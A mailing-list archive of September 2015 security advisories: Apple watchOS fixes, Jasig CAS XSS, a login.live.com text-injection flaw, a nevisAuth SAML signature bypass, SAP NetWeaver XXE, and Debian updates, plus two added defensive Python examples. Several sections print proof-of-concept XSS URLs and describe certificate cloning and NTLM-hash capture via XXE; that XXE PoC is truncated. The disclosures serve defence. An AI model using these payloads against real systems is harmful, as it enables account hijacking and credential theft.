APPLE-SA-2015-09-21-1 watchOS 2

2015-09-21 Thread Apple Product Security

APPLE-SA-2015-09-21-1 watchOS 2

watchOS 2 is now available and addresses the following:

Apple Pay
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Some cards may allow a terminal to retrieve limited recent
transaction information when making a payment
Description:  The transaction log functionality was enabled in
certain configurations. This issue was addressed by removing the
transaction log functionality.
CVE-ID
CVE-2015-5916

Audio
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Playing a malicious audio file may lead to an unexpected
application termination
Description:  A memory corruption issue existed in the handling of
audio files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea

Certificate Trust Policy
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Update to the certificate trust policy
Description:  The certificate trust policy was updated. The complete
list of certificates may be viewed at
https://support.apple.com/en-us/HT204873.

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker with a privileged network position may intercept
SSL/TLS connections
Description:  A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Connecting to a malicious web proxy may set malicious
cookies for a website
Description:  An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker in a privileged network position can track a
user's activity
Description:  A cross-domain cookie issue existed in the handling of
top level domains. The issue was addressed through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description:  An issue existed in FTP clients while checking when
proxy was in use. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  A person with physical access to an iOS device may read
cache data from Apple apps
Description:  Cache data was encrypted with a key protected only by
the hardware UID. This issue was addressed by encrypting the cache
data with a key protected by the hardware UID and the user's
passcode.
CVE-ID
CVE-2015-5898 : Andreas Kurtz of NESO Security Labs

CoreCrypto
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker may be able to determine a private key
Description:  By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.

CoreText
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team

Data Detectors Engine
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Processing a maliciously crafted text file may lead to
arbitrary code execution
Description:  Memory corruption issues existed in the processing of
text files. These issues were addressed through improved bounds
checking.
CVE-ID
CVE-2015-5829 : M1x7e1 of Safeye Team (www.safeye.org)

Dev Tools
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash

dyld
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An application may be able to bypass code signing
Description:  An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguT

Jasig CAS server vulnerabilities

2015-09-21 Thread Antoni Klajn

Hi,

Jasig CAS server version 4.0.1 is prone to XSS vulnerabilities

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:


1) XSS in OpenID server


Obtain method:
Paste this URL
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
in OpenID client and try to log in.
space char is not allowed, you can use new line

Example redirection link
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F

Result


2) XSS in OAuth server

Example link
https://oauth.example.com/cas/oauth2.0/authorize?client_id=&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com
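
An added example, not part of the original post and not Jasig CAS code: the two controls that stop a reflected `redirect_uri` like the one above, strict validation before use and attribute encoding on output. The suffix check shown for contrast is an assumption suggested by the `.trusted-domain.com` ending of the example link; `REGISTERED_HOSTS` and the function names are hypothetical.

```python
import html
from urllib.parse import urlsplit

# Hypothetical allow-list of registered client hosts (exact names, not suffixes).
REGISTERED_HOSTS = {"app.trusted-domain.com"}

# redirect_uri value from the example link on this page, URL-decoded.
PAGE_VALUE = '"onmouseover=alert(1) .trusted-domain.com'


def suffix_check(redirect_uri: str) -> bool:
    """Weak check (assumed, for contrast): anything with the right ending passes."""
    return redirect_uri.endswith(".trusted-domain.com")


def strict_check(redirect_uri: str) -> bool:
    """Accept only a well-formed https URL whose host is registered exactly."""
    # Quotes, angle brackets, spaces, new lines and other control characters
    # never belong in a redirect URI; reject before parsing.
    for ch in redirect_uri:
        if ch in "\"'<>\\" or ord(ch) < 0x21 or ord(ch) == 0x7F:
            return False
    try:
        parts = urlsplit(redirect_uri)
    except ValueError:
        return False
    return parts.scheme == "https" and parts.hostname in REGISTERED_HOSTS


def render_link(redirect_uri: str) -> str:
    """Reflect a value inside a double-quoted attribute, HTML-encoded."""
    return '<a href="{}">continue</a>'.format(html.escape(redirect_uri, quote=True))


if __name__ == "__main__":
    for value in (PAGE_VALUE, "https://app.trusted-domain.com/callback"):
        print(repr(value), suffix_check(value), strict_check(value))
    print(render_link(PAGE_VALUE))
```

Validation and encoding are independent layers: the encoded output stays inert even if a bad value slips past validation, because the quote can no longer close the attribute.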




Advisory: Insufficient Parameter Sanitization in login.live.com (Microsoft)

2015-09-21 Thread securityresearch
Original at:
http://securityresearch.shaftek.biz/2015/09/insufficient-parameter-sanitization-login-live-com.html

Overview
Web widgets hosted by Microsoft’s online login portal, login.live.com, do not 
perform sufficient parameter sanitization allowing an attacker to inject 
arbitrary text.

Background
Microsoft offers several legacy Javascript widgets that are used to display and 
customize sign-in link and buttons using Windows Live ID. They are hosted on 
login.live.com at the following URLs:

https://login.live.com/controls/WebAuth.htm
https://login.live.com/controls/WebAuthButton.htm
https://login.live.com/controls/WebAuthLogo.htm

They are documented by Microsoft here and accept several parameters that are 
used to customize the resulting widget.

Details
One of the parameters, style, is used to pass in CSS styling commands for the 
Javascript widgets described above. However, this parameter is not sanitized, 
and reflects back the information passed to it via Javascript's alert() 
method. It can be coerced to reflect arbitrary text of the attacker’s choosing, 
making it seemingly appear on a legit Microsoft website. While this does not 
result in script execution, it can be used as part of a social engineering 
campaign to attack users.

Example URL with malicious content:

https://login.live.com/controls/WebAuth.htm?appid=test&style=Please_call_Microsoft_Support_at_1-800-BAD-GUYS_and_provide_your_username_and_password:t

References
MSRC Case # 30838 / TRK # 0189016
Microsoft Sign-in Link API: 
https://msdn.microsoft.com/en-us/library/bb676638.aspx

Credits
Thank you to Grier Forensics for providing advice.

Bounty Information
This discovery qualified for a security bounty under the terms of Microsoft's 
Online Services Bug Bounty program.

Timeline
2015-08-06: Vendor notified
2015-08-06: Initial vendor response
2015-08-11: Vendor replicated the issue
2015-08-31: Fix deployed by vendor
2015-09-17: Bounty received 
2015-09-21: Public disclosure

Version Information
Version 2
Last updated on 2015-09-20


CVE-2015-5372 SAML SP Authentication Bypass in nevisAuth

2015-09-21 Thread Antoine Neuenschwander
#
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#
#
# Product:   nevisAuth [1]
# Vendor:    AdNovum [2]
# CVD ID:    CVE-2015-5372
# Subject:   Authentication Bypass
# Risk:      Critical
# Effect:    Remotely exploitable
# Authors:   Antoine Neuenschwander (antoine.neuenschwan...@csnc.ch)
#            Roland Bischofberger (roland.bischofber...@csnc.ch)
# Date:      2015-09-21
#
#

Introduction:
-
nevisAuth implements strong user and system authentication for identity and
access management solutions. It offers secure execution of multi-step
authentication and is able to dynamically adjust authentication strengths.
nevisAuth is highly flexible, easily integrated and supports plug-ins to various
authentication methods. [1]

Security Analysts of Compass Security Schweiz AG [3] discovered a security flaw
in the SAML 2.0 implementation of nevisAuth, which allows an attacker to bypass
the signature validation of security assertions, and therefore impersonate other
users.


Affected:
-
nevisAuth since v4.13.0.0 (2012-11-21)
A security fix was released with version v4.18.3.1 (2015-07-02)


Technical Description:
--
When configured as a SAML 2.0 service provider (SP), nevisAuth authenticates
users based on security assertions issued and signed by a trusted identity
provider (IdP). An assertion contains various fields about the user or subject
being authenticated, e.g. a name identifier (NameID), various attributes and
timestamps. Trust is based on the IdP's certificate, which is used to validate
the digital signature of security assertions.

In a setup where security assertions are conveyed via User-Agent (i.e when using
HTTP POST Binding), it is possible to forge and inject new assertions based on
data intercepted during a valid past authentication process. To achieve this,
the signing certificate is extracted from the assertion and then cloned to
reflect all X.509 data fields. A new public/private key pair is generated. The
public key is inserted into the certificate and the private key is used to sign
it. The signing certificate in the security assertion is now replaced with its
rogue copy. The attacker can then modify arbitrary values of the assertion, for
example the NameID. Finally, the assertion is signed with the cloned
certificate.

Due to a flaw in affected versions of nevisAuth, it is possible to bypass
validation of security assertions by presenting the system with forged
assertions as described above. In consequence, an attacker can impersonate
other users. More details on the attack can be found in [4].


Workaround / Fix:
-
AdNovum released a security fix in nevisAuth v4.18.3.1 (2015-07-02) to address
this issue.

Alternatively, when using HTTP POST Binding, use encrypted security assertions
for transmission via the User-Agent. Or completely avoid transmitting security
assertions over insecure channels by using HTTP Artifact Binding.


Timeline:
-
2015-06-26: Discovered vulnerability
2015-06-30: CVE ID requested
2015-07-01: Initial vendor notification
2015-07-02: Vendor confirmed security issue
2015-07-03: Vendor released security fix & guidance to its customers
2015-07-06: CVE ID assigned
2015-09-21: Public disclosure


Acknowledgements:
-
This vulnerability was discovered using the SAMLRaider Plugin [5] for Burp
Suite [6], developed by Roland Bischofberger (roland.bischofber...@csnc.ch) and
Emanuel Duss (emanuel.d...@gmail.com).


References:
---
[1]: https://www.nevis.ch/en/products/nevisauth-authentication-service.html
[2]: http://www.adnovum.ch/en/
[3]: http://www.csnc.ch/advisories
[4]: http://blog.csnc.ch/2015/09/saml-sp-authentication-bypass-vulnerability-in-nevisauth
[5]: https://github.com/SAMLRaider/SAMLRaider
[6]: http://portswigger.net/burp/
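
An added example, not part of the advisory and not nevisAuth code: a service-provider gate that accepts an assertion only when the certificate carried in its `ds:KeyInfo` is byte-identical to an IdP certificate pinned in local configuration, which is the property a cloned certificate cannot satisfy. The certificate bytes, the sample responses and all function names are constructed for illustration; rejecting responses without an embedded certificate is a policy choice of this sketch.

```python
import base64
import binascii
import hashlib
import hmac
import xml.etree.ElementTree as ET

DS_CERT = "{http://www.w3.org/2000/09/xmldsig#}X509Certificate"

# Constructed stand-ins for DER certificates: identical descriptive fields,
# different key bytes, which is what a cloned certificate amounts to.
IDP_CERT = b"CN=idp.example.test,serial=01,key=" + bytes(range(32))
CLONED_CERT = b"CN=idp.example.test,serial=01,key=" + bytes(range(32, 64))

# Trust anchor comes from the SP's own configuration, never from the message.
PINNED_SHA256 = frozenset({hashlib.sha256(IDP_CERT).hexdigest()})


def sample_response(cert, name_id):
    """Build a minimal constructed SAML-like response carrying `cert` in KeyInfo."""
    key_info = ""
    if cert is not None:
        key_info = ("<ds:KeyInfo><ds:X509Data><ds:X509Certificate>"
                    + base64.b64encode(cert).decode()
                    + "</ds:X509Certificate></ds:X509Data></ds:KeyInfo>")
    return ('<Response xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
            "<Assertion><ds:Signature>" + key_info + "</ds:Signature>"
            "<Subject><NameID>" + name_id + "</NameID></Subject>"
            "</Assertion></Response>")


def embedded_fingerprints(xml_text):
    """SHA-256 fingerprints of every certificate embedded in the message."""
    root = ET.fromstring(xml_text)
    prints = []
    for el in root.iter(DS_CERT):
        der = base64.b64decode("".join((el.text or "").split()), validate=True)
        prints.append(hashlib.sha256(der).hexdigest())
    return prints


def signer_is_pinned(xml_text, pinned=PINNED_SHA256):
    """True only if every embedded certificate matches a pinned fingerprint.

    This is a pre-check. The signature itself must still be verified
    afterwards, with the key of the pinned certificate.
    """
    try:
        prints = embedded_fingerprints(xml_text)
    except (ET.ParseError, binascii.Error):
        return False
    if not prints:
        return False
    return all(any(hmac.compare_digest(p, t) for t in pinned) for p in prints)


if __name__ == "__main__":
    print(signer_is_pinned(sample_response(IDP_CERT, "alice")))
    print(signer_is_pinned(sample_response(CLONED_CERT, "admin")))
```

Comparing subject, issuer or serial fields is not a substitute: those are the fields a clone reproduces, while the fingerprint covers the public key as well.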


SAP NetWeaver - XML External Entity Injection

2015-09-21 Thread Lukasz Miedzinski
Title: SAP NetWeaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===

SAP NetWeaver : <7.01

Vendor advisories (only for customers):
===
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=
XML External Entity Injection vulnerability has been found in the XML
parser in the System Administration->XML Content and Actions -> Import
section.


Vulnerabilities :
*

XML External Entity Injection :
==


Example shows how a pentester is able to get the NTLM hash of the application's user.

Content of file (PoC) :


 %remote; %param1; ]>


When the pentester has the metasploit smb_capture module running, the
application will contact him and provide the NTLM hash of the user.


Contact :
=

Lukasz[dot]Miedzinski[at]gmail[dot]com


[SECURITY] [DSA 3363-1] owncloud-client security update

2015-09-21 Thread Luciano Bello

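-------------------------------------------------------------------------
Debian Security Advisory DSA-3363-1                   secur...@debian.org
https://www.debian.org/security/                            Luciano Bello
September 20, 2015                    https://www.debian.org/security/faq
-------------------------------------------------------------------------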

Package: owncloud-client
CVE ID : CVE-2015-4456

Johannes Kliemann discovered a vulnerability in ownCloud Desktop Client,
the client-side of the ownCloud file sharing services. The vulnerability
allows man-in-the-middle attacks in situations where the server is using
self-signed certificates and the connection is already established. If
the user in the client side manually distrusts the new certificate, the
file syncing will continue using the malicious server as valid.

For the stable distribution (jessie), this problem has been fixed in
version 1.7.0~beta1+really1.6.4+dfsg-1+deb8u1.

For the testing distribution (stretch), this problem has been fixed
in version 1.8.4+dfsg-1.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.4+dfsg-1.

We recommend that you upgrade your owncloud-client packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Defense in depth -- the Microsoft way (part 35): Windows Explorer ignores "Run as administrator" ...

2015-09-21 Thread Stefan Kanthak
Hi @ll,

since Microsoft introduced the security theatre named "user account
control" with Windows Vista users can't start (another instance of)
the Windows Explorer with elevated rights any more: the "Run as
administrator" and the "Run as different user" context menu entries
only start another instance of Windows Explorer with but the
credentials of the logged on (interactive) user.

No, neither starting Windows Explorer per "Explorer.Exe /Separate"
nor setting the following registry entries overcomes this limitation:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"DesktopProcess"=dword:01

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"SeparateProcess"=dword:01


Microsoft is well aware of this, but still doesn't remove or disable
these dysfunctional context menu entries for Explorer.exe, although
their own user experience interface guidelines request that (context)
menu entries which are not applicable must not be shown or have to be
disabled!

See :

| Disable menu items that don't apply to the current context
...
| Remove rather than disable context menu items that don't
| apply to the current context.

or 

If you want to get rid of "Run as administrator" and "Run as
different user" for Explorer.exe to save yourself, your users and
your support/helpdesk from confusion or frustration add the following
registry entries:

[HKEY_CLASSES_ROOT\exefile\Shell\RunAs]
"AppliesTo"="System.FileName:<>Explorer.Exe"

[HKEY_CLASSES_ROOT\exefile\Shell\RunAsUser]
"AppliesTo"="System.FileName:<>Explorer.Exe"

See 
and 
to understand how and why this registry entry works.

JFTR: the context menu entry "Run as administrator" doesn't work at
  all in standard user accounts when UAC is set to "never elevate".
  This is another clear violation of Microsoft's own UX guidelines!

stay tuned
Stefan Kanthak

PS: the script  adds
this and several other missing registry entries which enable
"Run as administrator" and "Run as different user" for quite some
file types.


[SECURITY] [DSA 3362-1] qemu-kvm security update

2015-09-21 Thread Salvatore Bonaccorso

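-------------------------------------------------------------------------
Debian Security Advisory DSA-3362-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 18, 2015                    https://www.debian.org/security/faq
-------------------------------------------------------------------------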

Package: qemu-kvm
CVE ID : CVE-2015-5278 CVE-2015-5279 CVE-2015-6815 CVE-2015-6855

Several vulnerabilities were discovered in qemu-kvm, a full
virtualization solution on x86 hardware.

CVE-2015-5278

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash).

CVE-2015-5279

Qinghao Tang of QIHU 360 Inc. discovered a heap buffer overflow flaw
in the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash), or
potentially to execute arbitrary code on the host with the
privileges of the hosting QEMU process.

CVE-2015-6815

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the e1000 NIC emulation. A privileged guest user could use this flaw
to mount a denial of service (QEMU process crash).

CVE-2015-6855

Qinghao Tang of QIHU 360 Inc. discovered a flaw in the IDE
subsystem in QEMU occurring while executing IDE's
WIN_READ_NATIVE_MAX command to determine the maximum size of a
drive. A privileged guest user could use this flaw to mount a
denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6+deb7u11.

We recommend that you upgrade your qemu-kvm packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 3361-1] qemu security update

2015-09-21 Thread Salvatore Bonaccorso

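-------------------------------------------------------------------------
Debian Security Advisory DSA-3361-1                   secur...@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
September 18, 2015                    https://www.debian.org/security/faq
-------------------------------------------------------------------------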

Package: qemu
CVE ID : CVE-2015-5278 CVE-2015-5279 CVE-2015-6815 CVE-2015-6855
Debian Bug : 798101 799073 799074

Several vulnerabilities were discovered in qemu, a fast processor
emulator.

CVE-2015-5278

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash).

CVE-2015-5279

Qinghao Tang of QIHU 360 Inc. discovered a heap buffer overflow flaw
in the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash), or
potentially to execute arbitrary code on the host with the
privileges of the hosting QEMU process.

CVE-2015-6815

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the e1000 NIC emulation. A privileged guest user could use this flaw
to mount a denial of service (QEMU process crash).

CVE-2015-6855

Qinghao Tang of QIHU 360 Inc. discovered a flaw in the IDE
subsystem in QEMU occurring while executing IDE's
WIN_READ_NATIVE_MAX command to determine the maximum size of a
drive. A privileged guest user could use this flaw to mount a
denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6a+deb7u11.

For the stable distribution (jessie), these problems have been fixed in
version 1:2.1+dfsg-12+deb8u4.

For the testing distribution (stretch), these problems have been fixed
in version 1:2.4+dfsg-3 or earlier.

For the unstable distribution (sid), these problems have been fixed in
version 1:2.4+dfsg-3 or earlier.

We recommend that you upgrade your qemu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org